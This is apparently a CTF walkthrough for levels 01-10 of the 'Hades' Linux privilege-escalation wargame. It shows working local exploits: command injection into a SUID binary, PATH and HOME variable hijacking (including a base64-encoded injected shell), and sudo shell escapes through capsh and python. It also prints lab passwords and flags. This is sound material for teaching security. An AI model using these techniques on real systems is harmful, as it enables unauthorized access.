Hades 01-10
Beginning
任务目标
mission.txt
User acantha has left us a to obtain her powers.
行动
Exploit it
hacker@hades:~$ cat /pazz/acantha_pass.txt
cat: /pazz/acantha_pass.txt: Permission denied
hacker@hades:~$ /opt/gift_hacker
bash: you: command not found
acantha@hades:~$ cat /pazz/acantha_pass.txt
mYYLhLBSkrzZqFydxGkn
User - acantha
flag - 01
^CaEuVJtJjaCwZtuuAFD^
任务目标
mission.txt
The user alala has left us a program, if we insert the 6 correct numbers, she gives us her password!
行动
ls -lah
drwxr-x--- 2 root acantha 4.0K Jul 26 2023 .
drwxr-xr-x 1 root root 4.0K Jul 26 2023 ..
-rw-r--r-- 1 acantha acantha 220 Apr 23 2023 .bash_logout
-rw-r--r-- 1 acantha acantha 3.5K Apr 23 2023 .bashrc
-rw-r--r-- 1 acantha acantha 807 Apr 23 2023 .profile
-rw-r----- 1 root acantha 22 Jul 26 2023 flagz.txt
-rw-r-x--- 1 root acantha 16K Jul 26 2023 guess
-rw-r----- 1 root acantha 275 Jul 26 2023 mission.txt
直接 base64 外带,然后反编译即可
反编译结果
int __fastcall main(int argc, const char **argv, const char **envp)
{
int v4; // [rsp+1Ch] [rbp-4h] BYREF
printf("Enter PIN code:\n");
__isoc99_scanf("%i", &v4);
if (v4 == 5880)
printf("DsYzpJQrCEndEWIMxWxu");
else
puts("\nNO :_(");
return 0;
}
User - alala
flag - 02
^gTdGmkwhDrCqKrDQpxH^
任务目标
mission.txt
User althea loves reading Linux help.
行动
ls -lah
drwxr-x--- 1 root alala 4.0K Jul 26 2023 .
drwxr-xr-x 1 root root 4.0K Jul 26 2023 ..
-rw-r--r-- 1 alala alala 220 Apr 23 2023 .bash_logout
-rw-r--r-- 1 alala alala 3.5K Jan 25 00:37 .bashrc
-rw-r--r-- 1 alala alala 807 Apr 23 2023 .profile
-r--r----- 1 althea althea 21 Jul 26 2023 althea_pass.txt
-rw-r----- 1 root alala 22 Jul 26 2023 flagz.txt
-rw-r----- 1 root alala 164 Jul 26 2023 mission.txt
-rwS--s--- 1 root alala 16K Jul 26 2023 read
Exploit it
./read
# 进入后输入以下命令
!cat althea_pass.txt
# ObxEmwisYjERrDfvSbdA
User - althea
flag - 03
^btDtPAPzSiXmoHItpqX^
任务目标
mission.txt
The user andromeda has left us a program to list directories.
行动
ls -lah
drwxr-x--- 1 root althea 4.0K Jan 31 19:46 .
drwxr-xr-x 1 root root 4.0K Jul 26 2023 ..
-rw-r--r-- 1 althea althea 220 Apr 23 2023 .bash_logout
-rw-r--r-- 1 althea althea 3.5K Apr 23 2023 .bashrc
-rw-r--r-- 1 althea althea 807 Apr 23 2023 .profile
-r--r----- 1 andromeda andromeda 21 Jan 31 19:46 andromeda_pass.txt
-rw-r----- 1 root althea 22 Jul 26 2023 flagz.txt
-rwS--s--- 1 root althea 16K Jul 26 2023 lsme
-rw-r----- 1 root althea 205 Jul 26 2023 mission.txt
Exploit it
andromeda@hades:~$ ./lsme
Enter file to check:
;/bin/sh
total 28
-r--r----- 1 andromeda andromeda 21 Jan 31 19:46 andromeda_pass.txt
-rw-r----- 1 root althea 22 Jul 26 2023 flagz.txt
-rwS--s--- 1 root althea 16216 Jul 26 2023 lsme
-rw-r----- 1 root althea 205 Jul 26 2023 mission.txt
$ cat /pwned/althea/andromeda_pass.txt
OTWGTbHzrxhYFSTlKcOt
User - andromeda
flag - 04
^xzsHGrOeNctIZLGKzWq^
任务目标
mission.txt
The user anthea reminds us who we are.
行动
ls -lah
drwxr-x--- 2 root andromeda 4.0K Jul 26 2023 .
drwxr-xr-x 1 root root 4.0K Jul 26 2023 ..
-rw-r--r-- 1 andromeda andromeda 220 Apr 23 2023 .bash_logout
-rw-r--r-- 1 andromeda andromeda 3.5K Apr 23 2023 .bashrc
-rw-r--r-- 1 andromeda andromeda 807 Apr 23 2023 .profile
-r--r----- 1 anthea anthea 21 Jul 26 2023 anthea_pass.txt
-rw-r----- 1 root andromeda 22 Jul 26 2023 flagz.txt
-rw-r----- 1 root andromeda 166 Jul 26 2023 mission.txt
-rwS--s--- 1 root andromeda 16K Jul 26 2023 uid
Exploit it
andromeda@hades:~$ ln -sv /bin/bash /tmp/id
ln: failed to create symbolic link '/tmp/id': File exists
andromeda@hades:~$ PATH=/tmp
andromeda@hades:~$ ./uid
id: dircolors: command not found
anthea@hades:~$ export PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
anthea@hades:~$ cat anthea_pass.txt
yWFLtSNQArEBTHtWgkKd
User - anthea
flag - 05
^AcFLuAjhydNKIkPoFLL^
任务目标
mission.txt
User aphrodite is obsessed with the number 94.
行动
ls -lah
drwxr-x--- 1 root anthea 4.0K Jul 26 2023 .
drwxr-xr-x 1 root root 4.0K Jul 26 2023 ..
-rw-r--r-- 1 anthea anthea 220 Apr 23 2023 .bash_logout
-rw-r--r-- 1 anthea anthea 3.5K Feb 3 15:51 .bashrc
-rw-r--r-- 1 anthea anthea 807 Apr 23 2023 .profile
-r--r----- 1 aphrodite aphrodite 21 Jul 26 2023 aphrodite_pass.txt
-rw-r----- 1 root anthea 22 Jul 26 2023 flagz.txt
-rw-r----- 1 root anthea 175 Jul 26 2023 mission.txt
-rwS--s--- 1 root anthea 16K Jul 26 2023 obsessed
Exploit it
anthea@hades:~$ export MYID=^;./obsessed
Current MYID: 94
aphrodite@hades:~$ cat aphrodite_pass.txt
HPJVaqRzieKQeyyATsFv
User - aphrodite
flag - 06
^fmPlsDByrwmEpRAKgeP^
任务目标
mission.txt
The user ariadne knows what we keep in our HOME.
行动
ls -lah
drwxr-x--- 2 root aphrodite 4.0K Jul 26 2023 .
drwxr-xr-x 1 root root 4.0K Jul 26 2023 ..
-rw-r--r-- 1 aphrodite aphrodite 220 Apr 23 2023 .bash_logout
-rw-r--r-- 1 aphrodite aphrodite 3.5K Apr 23 2023 .bashrc
-rw-r--r-- 1 aphrodite aphrodite 807 Apr 23 2023 .profile
-r--r----- 1 ariadne ariadne 21 Jul 26 2023 ariadne_pass.txt
-rw-r----- 1 root aphrodite 22 Jul 26 2023 flagz.txt
-rwS--s--- 1 root aphrodite 16K Jul 26 2023 homecontent
-rw-r----- 1 root aphrodite 185 Jul 26 2023 mission.txt
Exploit it
aphrodite@hades:/pwned/aphrodite$ export HOME=$(echo L3B3bmVkL2FwaHJvZGl0ZTsvYmluL2Jhc2g= | base64 -d);./homecontent
The content of your HOME is:
ariadne_pass.txt flagz.txt homecontent mission.txt
ariadne@hades:/pwned/aphrodite$ cat ariadne_pass.txt
iNgNazuJrmhJKWixktzk
User - ariadne
flag - 07
^FuGFaFNhtKNxUInxAtd^
任务目标
mission.txt
The user arete lets us use cp on her behalf.
行动
ls -lah
drwxr-x--- 2 root ariadne 4.0K Jul 26 2023 .
drwxr-xr-x 1 root root 4.0K Jul 26 2023 ..
-rw-r--r-- 1 ariadne ariadne 220 Apr 23 2023 .bash_logout
-rw-r--r-- 1 ariadne ariadne 3.5K Apr 23 2023 .bashrc
-rw-r--r-- 1 ariadne ariadne 807 Apr 23 2023 .profile
-rw-r----- 1 root ariadne 22 Jul 26 2023 flagz.txt
-rw-r----- 1 root ariadne 165 Jul 26 2023 mission.txt
Exploit it
ariadne@hades:~$ sudo -u arete /bin/cp /pwned/arete/flagz.txt /dev/stdout
^qmrrbGUXLTqLFDyCDlx^
User - arete
flag - 08
^qmrrbGUXLTqLFDyCDlx^
任务目标
mission.txt
The user artemis allows us to use some binary on her behalf. Its a gift...
行动
ls -lah
drwxr-x--- 2 root arete 4.0K Jul 26 2023 .
drwxr-xr-x 1 root root 4.0K Jul 26 2023 ..
-rw-r--r-- 1 arete arete 220 Apr 23 2023 .bash_logout
-rw-r--r-- 1 arete arete 3.5K Apr 23 2023 .bashrc
-rw-r--r-- 1 arete arete 807 Apr 23 2023 .profile
-rw-r----- 1 root arete 22 Jul 26 2023 flagz.txt
-rw-r----- 1 root arete 227 Jul 26 2023 mission.txt
Exploit it
arete@hades:~$ sudo -u artemis /sbin/capsh --
artemis@hades:/pwned/arete$ cd
artemis@hades:~$ cat flagz.txt
^SegGdzPgnNdGAmKjnsa^
User - artemis
flag - 09
^SegGdzPgnNdGAmKjnsa^
任务目标
mission.txt
We need /bin/bash so that the user asia gives us her password.
行动
ls -lah
-rw-r--r-- 1 artemis artemis 220 Apr 23 2023 .bash_logout
-rw-r--r-- 1 artemis artemis 3.5K Apr 23 2023 .bashrc
-rw-r--r-- 1 artemis artemis 807 Apr 23 2023 .profile
-rw-r----- 1 root artemis 22 Jul 26 2023 flagz.txt
-rw-r----- 1 root artemis 202 Jul 26 2023 mission.txt
-rw---x--- 1 root artemis 16K Jul 26 2023 restricted
Exploit it
artemis@hades:~$ ./restricted
Your SHELL is: /bin/bash
djqWtkLisbQlrGtLYHCv
User - asia
flag - 10
^ngXdULWFWKCGtgxAQNv^
任务目标
mission.txt
The user asteria is teaching us to program in python.
行动
ls -lah
drwxr-x--- 2 root asia 4.0K Jul 26 2023 .
drwxr-xr-x 1 root root 4.0K Jul 26 2023 ..
-rw-r--r-- 1 asia asia 220 Apr 23 2023 .bash_logout
-rw-r--r-- 1 asia asia 3.5K Apr 23 2023 .bashrc
-rw-r--r-- 1 asia asia 807 Apr 23 2023 .profile
-rw-r----- 1 root asia 22 Jul 26 2023 flagz.txt
-rw-r----- 1 root asia 188 Jul 26 2023 mission.txt
Exploit it
asia@hades:~$ sudo -u asteria /usr/bin/python3 -c "import pty;pty.spawn('/bin/bash')"
asteria@hades:/pwned/asia$ cd
asteria@hades:~$ cat flagz.txt
^xSRhIftMsAwWvBAnqNZ^